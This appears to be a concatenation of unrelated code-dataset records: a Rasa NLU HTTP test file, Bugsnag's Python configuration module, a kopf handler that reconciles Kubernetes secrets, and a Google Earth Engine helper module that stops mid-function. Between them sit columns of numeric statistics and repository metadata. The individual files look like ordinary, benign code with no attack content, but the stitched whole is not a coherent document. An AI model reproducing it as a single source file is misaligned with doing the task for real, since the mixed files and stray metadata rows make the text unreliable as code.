@pytest.fixture(scope="module")
def app(tmpdir_factory):
"""
This fixture makes use of the IResource interface of the Klein application to mock Rasa HTTP server.
:param component_builder:
:return:
"""
_, nlu_log_file = tempfile.mkstemp(suffix="_rasa_nlu_logs.json")
_config = {
'write': nlu_log_file,
'port': -1, # unused in test app
"pipeline": "keyword",
"path": tmpdir_factory.mktemp("projects").strpath,
"server_model_dirs": {},
"data": "./data/demo-restaurants.json",
"emulate": "wit",
"max_training_processes": 1
}
config = RasaNLUConfig(cmdline_args=_config)
rasa = RasaNLU(config, testing=True)
return StubTreq(rasa.app.resource())
@pytest.fixture
def rasa_default_train_data():
with io.open('data/examples/rasa/demo-rasa.json',
encoding='utf-8') as train_file:
return json.loads(train_file.read())
@pytest.inlineCallbacks
def test_root(app):
response = yield app.get("http://dummy_uri/")
content = yield response.text()
assert response.code == 200 and content.startswith("hello")
@pytest.inlineCallbacks
def test_status(app):
response = yield app.get("http://dummy_uri/status")
rjs = yield response.json()
assert response.code == 200 and "available_projects" in rjs
assert "default" in rjs["available_projects"]
@pytest.inlineCallbacks
def test_config(app):
response = yield app.get("http://dummy_uri/config")
assert response.code == 200
@pytest.inlineCallbacks
def test_version(app):
response = yield app.get("http://dummy_uri/version")
rjs = yield response.json()
assert response.code == 200 and "version" in rjs
@pytest.mark.parametrize("response_test", [
ResponseTest(
"http://dummy_uri/parse?q=hello",
[{"entities": {}, "confidence": 1.0, "intent": "greet", "_text": "hello"}]
),
ResponseTest(
"http://dummy_uri/parse?query=hello",
[{"entities": {}, "confidence": 1.0, "intent": "greet", "_text": "hello"}]
),
ResponseTest(
"http://dummy_uri/parse?q=hello ńöñàśçií",
[{"entities": {}, "confidence": 1.0, "intent": "greet", "_text": "hello ńöñàśçií"}]
),
ResponseTest(
"http://dummy_uri/parse?q=",
[{"entities": {}, "confidence": 0.0, "intent": None, "_text": ""}]
),
])
@pytest.inlineCallbacks
def test_get_parse(app, response_test):
response = yield app.get(response_test.endpoint)
rjs = yield response.json()
assert response.code == 200
assert len(rjs) == 1
assert all(prop in rjs[0] for prop in ['entities', 'intent', '_text', 'confidence'])
@pytest.mark.parametrize("response_test", [
ResponseTest(
"http://dummy_uri/parse",
[{"entities": {}, "confidence": 1.0, "intent": "greet", "_text": "hello"}],
payload={"q": "hello"}
),
ResponseTest(
"http://dummy_uri/parse",
[{"entities": {}, "confidence": 1.0, "intent": "greet", "_text": "hello"}],
payload={"query": "hello"}
),
ResponseTest(
"http://dummy_uri/parse",
[{"entities": {}, "confidence": 1.0, "intent": "greet", "_text": "hello ńöñàśçií"}],
payload={"q": "hello ńöñàśçií"}
),
])
@pytest.inlineCallbacks
def test_post_parse(app, response_test):
response = yield app.post(response_test.endpoint, data=json.dumps(response_test.payload),
content_type='application/json')
rjs = yield response.json()
assert response.code == 200
assert len(rjs) == 1
assert all(prop in rjs[0] for prop in ['entities', 'intent', '_text', 'confidence'])
@utilities.slowtest
@pytest.inlineCallbacks
def test_post_train(app, rasa_default_train_data):
response = app.post("http://dummy_uri/train", data=json.dumps(rasa_default_train_data),
content_type='application/json')
time.sleep(3)
app.flush()
response = yield response
rjs = yield response.json()
assert response.code == 404, "A project name to train must be specified"
assert "error" in rjs
@utilities.slowtest
@pytest.inlineCallbacks
def test_post_train_internal_error(app, rasa_default_train_data):
response = app.post("http://dummy_uri/train?project=test",
data=json.dumps({"data": "dummy_data_for_triggering_an_error"}),
content_type='application/json')
time.sleep(3)
app.flush()
response = yield response
rjs = yield response.json()
assert response.code == 500, "The training data format is not valid"
assert "error" in rjs
@pytest.inlineCallbacks
def test_model_hot_reloading(app, rasa_default_train_data):
query = "http://dummy_uri/parse?q=hello&project=my_keyword_model"
response = yield app.get(query)
assert response.code == 404, "Project should not exist yet"
train_u = "http://dummy_uri/train?project=my_keyword_model&pipeline=keyword"
response = app.post(train_u,
data=json.dumps(rasa_default_train_data),
content_type='application/json')
time.sleep(3)
app.flush()
response = yield response
assert response.code == 200, "Training should end successfully"
response = yield app.get(query)
assert response.code == 200, "Project should now exist after it got trained"
| 32.205556
| 104
| 0.656719
| 709
| 5,797
| 5.19464
| 0.234133
| 0.036655
| 0.048873
| 0.068422
| 0.503665
| 0.473799
| 0.459408
| 0.437958
| 0.3489
| 0.309802
| 0
| 0.01256
| 0.203381
| 5,797
| 179
| 105
| 32.385475
| 0.784972
| 0.030533
| 0
| 0.461538
| 0
| 0
| 0.247185
| 0.020912
| 0
| 0
| 0
| 0
| 0.125874
| 1
| 0.076923
| false
| 0
| 0.097902
| 0
| 0.188811
| 0.006993
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
d5e7507528f57c95fde0e247aa2531f1d8579112
| 15,277
|
py
|
Python
|
bugsnag/configuration.py
|
ForroKulcs/bugsnag-python
|
107c1add31a2202cc08ef944aa00ab96996b247a
|
[
"MIT"
] | null | null | null |
bugsnag/configuration.py
|
ForroKulcs/bugsnag-python
|
107c1add31a2202cc08ef944aa00ab96996b247a
|
[
"MIT"
] | null | null | null |
bugsnag/configuration.py
|
ForroKulcs/bugsnag-python
|
107c1add31a2202cc08ef944aa00ab96996b247a
|
[
"MIT"
] | null | null | null |
import os
import platform
import socket
import sysconfig
from typing import List, Any, Tuple, Union
import warnings
from bugsnag.sessiontracker import SessionMiddleware
from bugsnag.middleware import DefaultMiddleware, MiddlewareStack
from bugsnag.utils import (fully_qualified_class_name, validate_str_setter,
validate_bool_setter, validate_iterable_setter,
validate_required_str_setter)
from bugsnag.delivery import (create_default_delivery, DEFAULT_ENDPOINT,
DEFAULT_SESSIONS_ENDPOINT)
from bugsnag.uwsgi import warn_if_running_uwsgi_without_threads
try:
from contextvars import ContextVar
_request_info = ContextVar('bugsnag-request', default=None) # type: ignore
except ImportError:
from bugsnag.utils import ThreadContextVar
_request_info = ThreadContextVar('bugsnag-request', default=None) # type: ignore # noqa: E501
__all__ = ('Configuration', 'RequestConfiguration')
class Configuration:
"""
Global app-level Bugsnag configuration settings.
"""
def __init__(self):
self.api_key = os.environ.get('BUGSNAG_API_KEY', None)
self.release_stage = os.environ.get("BUGSNAG_RELEASE_STAGE",
"production")
self.notify_release_stages = None
self.auto_notify = True
self.send_code = True
self.send_environment = False
self.asynchronous = True
self.delivery = create_default_delivery()
self.lib_root = sysconfig.get_path('purelib')
self.project_root = os.getcwd()
self.app_type = None
self.app_version = None
self.params_filters = ["password", "password_confirmation", "cookie",
"authorization"]
self.ignore_classes = [
"KeyboardInterrupt",
"django.http.Http404",
"django.http.response.Http404",
]
self.endpoint = DEFAULT_ENDPOINT
self.session_endpoint = DEFAULT_SESSIONS_ENDPOINT
self.auto_capture_sessions = True
self.traceback_exclude_modules = []
self.middleware = MiddlewareStack()
self.internal_middleware = MiddlewareStack()
self.internal_middleware.append(DefaultMiddleware)
self.internal_middleware.append(SessionMiddleware)
self.proxy_host = None
if not os.getenv("DYNO"):
self.hostname = socket.gethostname()
else:
self.hostname = None
self.runtime_versions = {"python": platform.python_version()}
def configure(self, api_key=None, app_type=None, app_version=None,
asynchronous=None, auto_notify=None,
auto_capture_sessions=None, delivery=None, endpoint=None,
hostname=None, ignore_classes=None, lib_root=None,
notify_release_stages=None, params_filters=None,
project_root=None, proxy_host=None, release_stage=None,
send_code=None, send_environment=None, session_endpoint=None,
traceback_exclude_modules=None):
"""
Validate and set configuration options. Will warn if an option is of an
incorrect type.
"""
if api_key is not None:
self.api_key = api_key
if app_type is not None:
self.app_type = app_type
if app_version is not None:
self.app_version = app_version
if asynchronous is not None:
self.asynchronous = asynchronous
if auto_notify is not None:
self.auto_notify = auto_notify
if auto_capture_sessions is not None:
self.auto_capture_sessions = auto_capture_sessions
if delivery is not None:
self.delivery = delivery
if endpoint is not None:
self.endpoint = endpoint
if hostname is not None:
self.hostname = hostname
if ignore_classes is not None:
self.ignore_classes = ignore_classes
if lib_root is not None:
self.lib_root = lib_root
if notify_release_stages is not None:
self.notify_release_stages = notify_release_stages
if params_filters is not None:
self.params_filters = params_filters
if project_root is not None:
self.project_root = project_root
if proxy_host is not None:
self.proxy_host = proxy_host
if release_stage is not None:
self.release_stage = release_stage
if send_code is not None:
self.send_code = send_code
if send_environment is not None:
self.send_environment = send_environment
if session_endpoint is not None:
self.session_endpoint = session_endpoint
if traceback_exclude_modules is not None:
self.traceback_exclude_modules = traceback_exclude_modules
return self
def get(self, name):
"""
Get a single configuration option
"""
warnings.warn('Using get() to retrieve a Configuration property is ' +
'deprecated in favor of referencing properties directly',
DeprecationWarning)
return getattr(self, name)
@property
def api_key(self):
"""
Unique application identifier
"""
return self._api_key
@api_key.setter # type: ignore
@validate_required_str_setter
def api_key(self, value: str):
self._api_key = value
@property
def app_type(self):
"""
Category for the current application or task
"""
return self._app_type
@app_type.setter # type: ignore
@validate_str_setter
def app_type(self, value: str):
self._app_type = value
@property
def app_version(self):
"""
Release version of the current application
"""
return self._app_version
@app_version.setter # type: ignore
@validate_str_setter
def app_version(self, value: str):
self._app_version = value
@property
def asynchronous(self):
"""
If API requests should be sent asynchronously
"""
return self._asynchronous
@asynchronous.setter # type: ignore
@validate_bool_setter
def asynchronous(self, value: bool):
self._asynchronous = value
if value:
warn_if_running_uwsgi_without_threads()
@property
def auto_capture_sessions(self):
"""
If sessions should be automatically detected and delivered from web
request integrations
"""
return self._auto_capture_sessions
@auto_capture_sessions.setter # type: ignore
@validate_bool_setter
def auto_capture_sessions(self, value: bool):
self._auto_capture_sessions = value
@property
def auto_notify(self):
"""
If uncaught exceptions should be automatically captured and reported
"""
return self._auto_notify
@auto_notify.setter # type: ignore
@validate_bool_setter
def auto_notify(self, value: bool):
self._auto_notify = value
@property
def delivery(self):
"""
Transport mechanism used to make API requests. Implement the Delivery
interface to customize how requests are sent.
"""
return self._delivery
@delivery.setter # type: ignore
def delivery(self, value):
if hasattr(value, 'deliver') and callable(value.deliver):
self._delivery = value
else:
message = ('delivery should implement Delivery interface, got ' +
'{0}. This will be an error in a future release.')
warnings.warn(message.format(type(value).__name__), RuntimeWarning)
@property
def endpoint(self):
"""
Event API endpoint. Set this property if using Bugsnag On-Premise.
>>> config = Configuration()
>>> config.endpoint = 'https://notify.bugsnag.example.co'
"""
return self._endpoint
@endpoint.setter # type: ignore
@validate_required_str_setter
def endpoint(self, value: str):
self._endpoint = value
@property
def hostname(self):
"""
The host name of the application server. This value is automatically
detected for Heroku applications and included in event device metadata.
"""
return self._hostname
@hostname.setter # type: ignore
@validate_str_setter
def hostname(self, value: str):
self._hostname = value
@property
def ignore_classes(self):
"""
Fully qualified class names which should be ignored when capturing
uncaught exceptions and other events. KeyboardInterrupt and Http404
exceptions are ignored by default.
"""
return self._ignore_classes
@ignore_classes.setter # type: ignore
@validate_iterable_setter
def ignore_classes(self, value: Union[List[str], Tuple[str]]):
self._ignore_classes = value
@property
def lib_root(self):
"""
The path to the Python library. Any traceback frame which contains
lib_root as a prefix is considered out-of-project. The prefix is also
stripped to make file names easier to read.
"""
return self._lib_root
@lib_root.setter # type: ignore
@validate_str_setter
def lib_root(self, value: str):
self._lib_root = value
@property
def notify_release_stages(self):
"""
A list of release_stage values which are permitted to capture and send
events and sessions. By default this value is None and all events and
sessions are delivered.
"""
return self._notify_release_stages
@notify_release_stages.setter # type: ignore
@validate_iterable_setter
def notify_release_stages(self, value: List[str]):
self._notify_release_stages = value
@property
def params_filters(self):
"""
A list of filters applied to event metadata to prevent the values from
being sent in events. By default the following keys are filtered:
* authorization
* cookie
* password
* password_confirmation
"""
return self._params_filters
@params_filters.setter # type: ignore
@validate_iterable_setter
def params_filters(self, value: List[str]):
self._params_filters = value
@property
def project_root(self):
"""
The working directory containing the application source code.
Traceback file paths which contain this prefix are considered a part of
the project. This prefix is also stripped to increase file name
readability in traceback lines.
"""
return self._project_root
@project_root.setter # type: ignore
@validate_str_setter
def project_root(self, value: str):
self._project_root = value
@property
def proxy_host(self):
"""
The host name of the proxy to use to deliver requests, if any
"""
return self._proxy_host
@proxy_host.setter # type: ignore
@validate_str_setter
def proxy_host(self, value: str):
self._proxy_host = value
@property
def release_stage(self):
"""
The development phase of the deployed application. This value is used
to differentiate events which occur in production vs development or
staging environments.
"""
return self._release_stage
@release_stage.setter # type: ignore
@validate_str_setter
def release_stage(self, value: str):
self._release_stage = value
@property
def send_code(self):
"""
If the source code lines immediately surrounding traceback locations
should be sent with events
"""
return self._send_code
@send_code.setter # type: ignore
@validate_bool_setter
def send_code(self, value: bool):
self._send_code = value
@property
def send_environment(self):
"""
If the request environment should be automatically collected and
attached to events
"""
return self._send_environment
@send_environment.setter # type: ignore
@validate_bool_setter
def send_environment(self, value: bool):
self._send_environment = value
@property
def session_endpoint(self):
"""
Sessions API endpoint. Set this property if using Bugsnag On-Premise.
>>> config = Configuration()
>>> config.session_endpoint = 'https://sessions.bugsnag.example.co'
"""
return self._session_endpoint
@session_endpoint.setter # type: ignore
@validate_required_str_setter
def session_endpoint(self, value: str):
self._session_endpoint = value
@property
def traceback_exclude_modules(self):
"""
Modules which should be stripped from event tracebacks entirely
"""
return self._traceback_exclude_modules
@traceback_exclude_modules.setter # type: ignore
@validate_iterable_setter
def traceback_exclude_modules(self, value: List[str]):
self._traceback_exclude_modules = value
def should_notify(self) -> bool:
return self.notify_release_stages is None or \
(isinstance(self.notify_release_stages, (tuple, list)) and
self.release_stage in self.notify_release_stages)
def should_ignore(self, exception: BaseException) -> bool:
return self.ignore_classes is not None and \
fully_qualified_class_name(exception) in self.ignore_classes
class RequestConfiguration:
"""
Per-request Bugsnag configuration settings.
"""
@classmethod
def get_instance(cls):
"""
Get this thread's instance of the RequestConfiguration.
"""
try:
instance = _request_info.get()
except LookupError:
instance = None
if instance is None:
instance = RequestConfiguration()
_request_info.set(instance) # type: ignore
return instance
@classmethod
def clear(cls):
"""
Clear this thread's instance of the RequestConfiguration.
"""
_request_info.set(None)
def __init__(self):
self.context = None
self.grouping_hash = None
self.user = {}
self.metadata = {}
# legacy fields
self.user_id = None
self.extra_data = {}
self.request_data = {}
self.environment_data = {}
self.session_data = {}
def get(self, name) -> Any:
"""
Get a single configuration option
"""
return getattr(self, name)
def configure(self, **options):
"""
Set one or more configuration settings.
"""
for name, value in options.items():
setattr(self, name, value)
return self
@property
def meta_data(self) -> Any:
warnings.warn('RequestConfiguration.meta_data has been renamed to ' +
'"metadata"', DeprecationWarning)
return self.metadata
| 31.695021
| 99
| 0.636185
| 1,714
| 15,277
| 5.456243
| 0.163944
| 0.023952
| 0.02021
| 0.027802
| 0.313195
| 0.155796
| 0.13719
| 0.066082
| 0.026946
| 0.015825
| 0
| 0.001204
| 0.292989
| 15,277
| 481
| 100
| 31.760915
| 0.864642
| 0.199057
| 0
| 0.173913
| 0
| 0
| 0.044747
| 0.008791
| 0
| 0
| 0
| 0
| 0
| 1
| 0.170569
| false
| 0.003344
| 0.046823
| 0.006689
| 0.317726
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
d5e7f6433ef2aafee2885217cc2a65201e60c31e
| 587
|
py
|
Python
|
secret_injector/secret.py
|
failk8s/failk8s-operator
|
457890a09a2551b9002eec73386b11a37469569f
|
[
"Apache-2.0"
] | null | null | null |
secret_injector/secret.py
|
failk8s/failk8s-operator
|
457890a09a2551b9002eec73386b11a37469569f
|
[
"Apache-2.0"
] | null | null | null |
secret_injector/secret.py
|
failk8s/failk8s-operator
|
457890a09a2551b9002eec73386b11a37469569f
|
[
"Apache-2.0"
] | null | null | null |
import kopf
from .functions import global_logger, reconcile_secret
@kopf.on.event("", "v1", "secrets")
def injector_secret_event(type, event, logger, **_):
obj = event["object"]
namespace = obj["metadata"]["namespace"]
name = obj["metadata"]["name"]
# If secret already exists, indicated by type being None, the
# secret is added or modified later, do a full reconcilation to
# ensure that if now match will inject the secret.
with global_logger(logger):
if type in (None, "ADDED", "MODIFIED"):
reconcile_secret(name, namespace, obj)
| 30.894737
| 67
| 0.67632
| 77
| 587
| 5.064935
| 0.597403
| 0.061538
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.002146
| 0.206133
| 587
| 18
| 68
| 32.611111
| 0.834764
| 0.289608
| 0
| 0
| 0
| 0
| 0.138015
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.1
| false
| 0
| 0.2
| 0
| 0.3
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
d5e86c6edc684a9da3a98d63325e3f3c6ab77abb
| 25,390
|
py
|
Python
|
src/py/gee/utils.py
|
openforis/collectearthonline
|
1af48e373c393a1d8c48b17472f6aa6c41f65769
|
[
"MIT"
] | null | null | null |
src/py/gee/utils.py
|
openforis/collectearthonline
|
1af48e373c393a1d8c48b17472f6aa6c41f65769
|
[
"MIT"
] | null | null | null |
src/py/gee/utils.py
|
openforis/collectearthonline
|
1af48e373c393a1d8c48b17472f6aa6c41f65769
|
[
"MIT"
] | null | null | null |
import datetime
import os
import ee
import math
import sys
import json
from ee.ee_exception import EEException
from gee.inputs import getLandsat, getS1
########## Helper functions ##########
def initialize(ee_account='', ee_key_path=''):
try:
if ee_account and ee_key_path and os.path.exists(ee_key_path):
credentials = ee.ServiceAccountCredentials(ee_account, ee_key_path)
ee.Initialize(credentials)
else:
ee.Initialize()
except Exception as e:
print(e)
def getReducer(reducer):
reducerName = reducer.lower()
if(reducerName == 'min'):
return ee.Reducer.min()
elif (reducerName == 'max'):
return ee.Reducer.max()
elif (reducerName == 'mean'):
return ee.Reducer.mean()
elif (reducerName == 'mode'):
return ee.Reducer.mode()
elif (reducerName == 'first'):
return ee.Reducer.first()
elif (reducerName == 'last'):
return ee.Reducer.last()
elif (reducerName == 'sum'):
return ee.Reducer.sum()
else:
return ee.Reducer.median()
def reduceIC(imageCollection, reducer):
reducerName = reducer.lower()
if(reducerName == 'min'):
return imageCollection.min()
elif (reducerName == 'max'):
return imageCollection.max()
elif (reducerName == 'mean'):
return imageCollection.mean()
elif (reducerName == 'mode'):
return imageCollection.mode()
elif (reducerName == 'mosaic'):
return imageCollection.mosaic()
elif (reducerName == 'first'):
return imageCollection.first()
elif (reducerName == 'sum'):
return imageCollection.sum()
else:
return imageCollection.median()
def safeParseJSON(val):
if isinstance(val, dict):
return val
else:
try:
return json.loads(val)
except Exception as e:
try:
return json.loads(val.replace("'", "\""))
except Exception as e:
return {}
########## Helper routes ##########
def listAvailableBands(name, assetType):
eeImage = None
if assetType == "imageCollection":
eeImage = ee.ImageCollection(name).first()
else:
eeImage = ee.Image(name)
return {
'bands': eeImage.bandNames().getInfo(),
'imageName': name
}
########## ee.Image ##########
def imageToMapId(image, visParams):
eeImage = ee.Image(image)
mapId = eeImage.getMapId(visParams)
# TODO, just return URL so the routes are easier to deduce whats being returned.
return {
'url': mapId['tile_fetcher'].url_format
}
########## ee.ImageCollection ##########
def imageCollectionToMapId(assetId, visParams, reducer, startDate, endDate):
eeCollection = ee.ImageCollection(assetId)
if (startDate and endDate):
eeFilterDate = ee.Filter.date(startDate, endDate)
eeCollection = eeCollection.filter(eeFilterDate)
reducedImage = ee.Image(reduceIC(eeCollection, reducer))
return imageToMapId(reducedImage, visParams)
# TODO, should we allow user to select first cloud free image again?
def firstCloudFreeImageInMosaicToMapId(assetId, visParams, startDate, endDate):
skipCloudMask = False
eeCollection = ee.ImageCollection(assetId)
lowerAsset = assetId.lower()
if("b2" not in visParams["bands"].lower()):
skipCloudMask = True
elif ("lc8" in lowerAsset):
skipCloudMask = False
elif ("le7" in lowerAsset):
skipCloudMask = False
elif ("lt5" in lowerAsset):
skipCloudMask = False
else:
skipCloudMask = True
if (startDate and endDate):
eeFilterDate = ee.Filter.date(startDate, endDate)
eeCollection = eeCollection.filter(eeFilterDate)
eeFirstImage = ee.Image(eeCollection.mosaic())
try:
if(skipCloudMask == False):
sID = ''
if ("lc8" in lowerAsset):
sID = 'OLI_TIRS'
elif ("le7" in lowerAsset):
sID = 'ETM'
elif ("lt5" in lowerAsset):
sID = 'TM'
scored = ee.Algorithms.Landsat.simpleCloudScore(
eeFirstImage.set('SENSOR_ID', sID))
mask = scored.select(['cloud']).lte(20)
masked = eeFirstImage.updateMask(mask)
values = imageToMapId(masked, visParams)
else:
values = imageToMapId(eeFirstImage, visParams)
except EEException as ine:
imageToMapId(eeFirstImage, visParams)
return values
########## ee.FeatureCollection ##########
def getFeatureCollectionTileUrl(featureCollection, field, matchID, visParams):
fc = ee.FeatureCollection(featureCollection)
single = fc.filter(ee.Filter.equals(field, matchID))
mapId = ee.Image().paint(single, 0, 2).getMapId(visParams)
return mapId['tile_fetcher'].url_format
########## Pre defined ee.ImageCollection ##########
# Index Image Collection
def lsMaskClouds(img, cloudThresh=10):
score = ee.Image(1.0)
# Clouds are reasonably bright in the blue band.
blue_rescale = img.select('blue').subtract(ee.Number(0.1)).divide(
ee.Number(0.3).subtract(ee.Number(0.1)))
score = score.min(blue_rescale)
# Clouds are reasonably bright in all visible bands.
visible = img.select('red').add(
img.select('green')).add(img.select('blue'))
visible_rescale = visible.subtract(ee.Number(0.2)).divide(
ee.Number(0.8).subtract(ee.Number(0.2)))
score = score.min(visible_rescale)
# Clouds are reasonably bright in all infrared bands.
infrared = img.select('nir').add(
img.select('swir1')).add(img.select('swir2'))
infrared_rescale = infrared.subtract(ee.Number(0.3)).divide(
ee.Number(0.8).subtract(ee.Number(0.3)))
score = score.min(infrared_rescale)
# Clouds are reasonably cool in temperature.
temp_rescale = img.select('temp').subtract(ee.Number(300)).divide(
ee.Number(290).subtract(ee.Number(300)))
score = score.min(temp_rescale)
# However, clouds are not snow.
ndsi = img.normalizedDifference(['green', 'swir1'])
ndsi_rescale = ndsi.subtract(ee.Number(0.8)).divide(
ee.Number(0.6).subtract(ee.Number(0.8)))
score = score.min(ndsi_rescale).multiply(100).byte()
mask = score.lt(cloudThresh).rename(['cloudMask'])
img = img.updateMask(mask)
return img.addBands(score)
def s2MaskClouds(img):
qa = img.select('QA60')
# Bits 10 and 11 are clouds and cirrus, respectively.
cloudBitMask = int(math.pow(2, 10))
cirrusBitMask = int(math.pow(2, 11))
# clear if both flags set to zero.
clear = qa.bitwiseAnd(cloudBitMask).eq(0).And(
qa.bitwiseAnd(cirrusBitMask).eq(0))
return img.divide(10000).updateMask(clear).set('system:time_start', img.get('system:time_start'))
def bandPassAdjustment(img):
keep = img.select(['temp'])
bands = ['blue', 'green', 'red', 'nir', 'swir1', 'swir2']
# linear regression coefficients for adjustment
gain = ee.Array([[0.977], [1.005], [0.982], [1.001], [1.001], [0.996]])
bias = ee.Array([[-0.00411], [-0.00093], [0.00094],
[-0.00029], [-0.00015], [-0.00097]])
# Make an Array Image, with a 2-D Array per pixel.
arrayImage2D = img.select(bands).toArray().toArray(1)
# apply correction factors and reproject array to geographic image
componentsImage = ee.Image(gain).multiply(arrayImage2D).add(ee.Image(bias)) \
.arrayProject([0]).arrayFlatten([bands]).float()
# .set('system:time_start',img.get('system:time_start'));
return keep.addBands(componentsImage)
def getLandSatMergedCollection():
sensorBandDictLandsatTOA = {'L8': [1, 2, 3, 4, 5, 9, 6],
'L7': [0, 1, 2, 3, 4, 5, 7],
'L5': [0, 1, 2, 3, 4, 5, 6],
'L4': [0, 1, 2, 3, 4, 5, 6],
'S2': [1, 2, 3, 7, 11, 10, 12]}
bandNamesLandsatTOA = ['blue', 'green',
'red', 'nir', 'swir1', 'temp', 'swir2']
metadataCloudCoverMax = 100
lt4 = ee.ImageCollection('LANDSAT/LT4_L1T_TOA') \
.filterMetadata('CLOUD_COVER', 'less_than', metadataCloudCoverMax) \
.select(sensorBandDictLandsatTOA['L4'], bandNamesLandsatTOA).map(lsMaskClouds)
lt5 = ee.ImageCollection('LANDSAT/LT5_L1T_TOA') \
.filterMetadata('CLOUD_COVER', 'less_than', metadataCloudCoverMax) \
.select(sensorBandDictLandsatTOA['L5'], bandNamesLandsatTOA).map(lsMaskClouds)
le7 = ee.ImageCollection('LANDSAT/LE7_L1T_TOA') \
.filterMetadata('CLOUD_COVER', 'less_than', metadataCloudCoverMax) \
.select(sensorBandDictLandsatTOA['L7'], bandNamesLandsatTOA).map(lsMaskClouds)
lc8 = ee.ImageCollection('LANDSAT/LC08/C01/T1_TOA') \
.filterMetadata('CLOUD_COVER', 'less_than', metadataCloudCoverMax) \
.select(sensorBandDictLandsatTOA['L8'], bandNamesLandsatTOA).map(lsMaskClouds)
s2 = ee.ImageCollection('COPERNICUS/S2') \
.filterMetadata('CLOUDY_PIXEL_PERCENTAGE', 'less_than', metadataCloudCoverMax) \
.map(s2MaskClouds).select(sensorBandDictLandsatTOA['S2'], bandNamesLandsatTOA) \
.map(bandPassAdjustment)
return ee.ImageCollection(lt4.merge(lt5).merge(le7).merge(lc8).merge(s2))
def filteredImageNDVIToMapId(startDate, endDate):
def calcNDVI(img):
return img.expression('(i.nir - i.red) / (i.nir + i.red)', {'i': img}).rename(['NDVI']) \
.set('system:time_start', img.get('system:time_start'))
eeCollection = getLandSatMergedCollection().filterDate(startDate, endDate)
colorPalette = 'c9c0bf,435ebf,eee8aa,006400'
visParams = {'opacity': 1, 'max': 1,
'min': -1, 'palette': colorPalette}
eviImage = ee.Image(eeCollection.map(calcNDVI).mean())
return imageToMapId(eviImage, visParams)
def filteredImageEVIToMapId(startDate, endDate):
def calcEVI(img):
return img.expression('2.5 * (i.nir - i.red) / (i.nir + 6.0 * i.red - 7.5 * i.blue + 1)', {'i': img}).rename(['EVI']) \
.set('system:time_start', img.get('system:time_start'))
eeCollection = getLandSatMergedCollection().filterDate(startDate, endDate)
colorPalette = 'F5F5F5,E6D3C5,C48472,B9CF63,94BF3D,6BB037,42A333,00942C,008729,007824,004A16'
visParams = {'opacity': 1, 'max': 1,
'min': -1, 'palette': colorPalette}
eviImage = ee.Image(eeCollection.map(calcEVI).mean())
return imageToMapId(eviImage, visParams)
def filteredImageEVI2ToMapId(startDate, endDate):
def calcEVI2(img):
return img.expression('2.5 * (i.nir - i.red) / (i.nir + 2.4 * i.red + 1)', {'i': img}).rename(['EVI2']) \
.set('system:time_start', img.get('system:time_start'))
eeCollection = getLandSatMergedCollection().filterDate(startDate, endDate)
colorPalette = 'F5F5F5,E6D3C5,C48472,B9CF63,94BF3D,6BB037,42A333,00942C,008729,007824,004A16'
visParams = {'opacity': 1, 'max': 1,
'min': -1, 'palette': colorPalette}
eviImage = ee.Image(eeCollection.map(calcEVI2).mean())
return imageToMapId(eviImage, visParams)
def filteredImageNDMIToMapId(startDate, endDate):
def calcNDMI(img):
return img.expression('(i.nir - i.swir1) / (i.nir + i.swir1)', {'i': img}).rename(['NDMI']) \
.set('system:time_start', img.get('system:time_start'))
eeCollection = getLandSatMergedCollection().filterDate(startDate, endDate)
colorPalette = '0000FE,2E60FD,31B0FD,00FEFE,50FE00,DBFE66,FEFE00,FFBB00,FF6F00,FE0000'
visParams = {'opacity': 1, 'max': 1,
'min': -1, 'palette': colorPalette}
eviImage = ee.Image(eeCollection.map(calcNDMI).mean())
return imageToMapId(eviImage, visParams)
def filteredImageNDWIToMapId(startDate, endDate):
def calcNDWI(img):
return img.expression('(i.green - i.nir) / (i.green + i.nir)', {'i': img}).rename(['NDWI']) \
.set('system:time_start', img.get('system:time_start'))
eeCollection = getLandSatMergedCollection().filterDate(startDate, endDate)
colorPalette = '505050,E8E8E8,00FF33,003300'
visParams = {'opacity': 1, 'max': 1,
'min': -1, 'palette': colorPalette}
eviImage = ee.Image(eeCollection.map(calcNDWI).mean())
return imageToMapId(eviImage, visParams)
def filteredImageByIndexToMapId(startDate, endDate, index):
lowerIndex = index.lower()
if (lowerIndex == 'ndvi'):
return filteredImageNDVIToMapId(startDate, endDate)
elif (lowerIndex == 'evi'):
return filteredImageEVIToMapId(startDate, endDate)
elif (lowerIndex == 'evi2'):
return filteredImageEVI2ToMapId(startDate, endDate)
elif (lowerIndex == 'ndmi'):
return filteredImageNDMIToMapId(startDate, endDate)
elif (lowerIndex == 'ndwi'):
return filteredImageNDWIToMapId(startDate, endDate)
def filteredImageCompositeToMapId(assetId, visParams, startDate, endDate, metadataCloudCoverMax, simpleCompositeVariable):
eeCollection = ee.ImageCollection(assetId)
if (startDate and endDate):
eeCollection = eeCollection.filterDate(startDate, endDate)
eeCollection.filterMetadata(
'CLOUD_COVER',
'less_than',
metadataCloudCoverMax
)
eeMosaicImage = ee.Algorithms.Landsat.simpleComposite(
eeCollection,
simpleCompositeVariable,
10,
40,
True
)
return imageToMapId(eeMosaicImage, visParams)
def filteredSentinelComposite(visParams, startDate, endDate, metadataCloudCoverMax):
def cloudScore(img):
def rescale(img, exp, thresholds):
return img.expression(exp, {'img': img}).subtract(thresholds[0]).divide(thresholds[1] - thresholds[0])
score = ee.Image(1.0)
score = score.min(rescale(img, 'img.B2', [0.1, 0.3]))
score = score.min(rescale(img, 'img.B4 + img.B3 + img.B2', [0.2, 0.8]))
score = score.min(
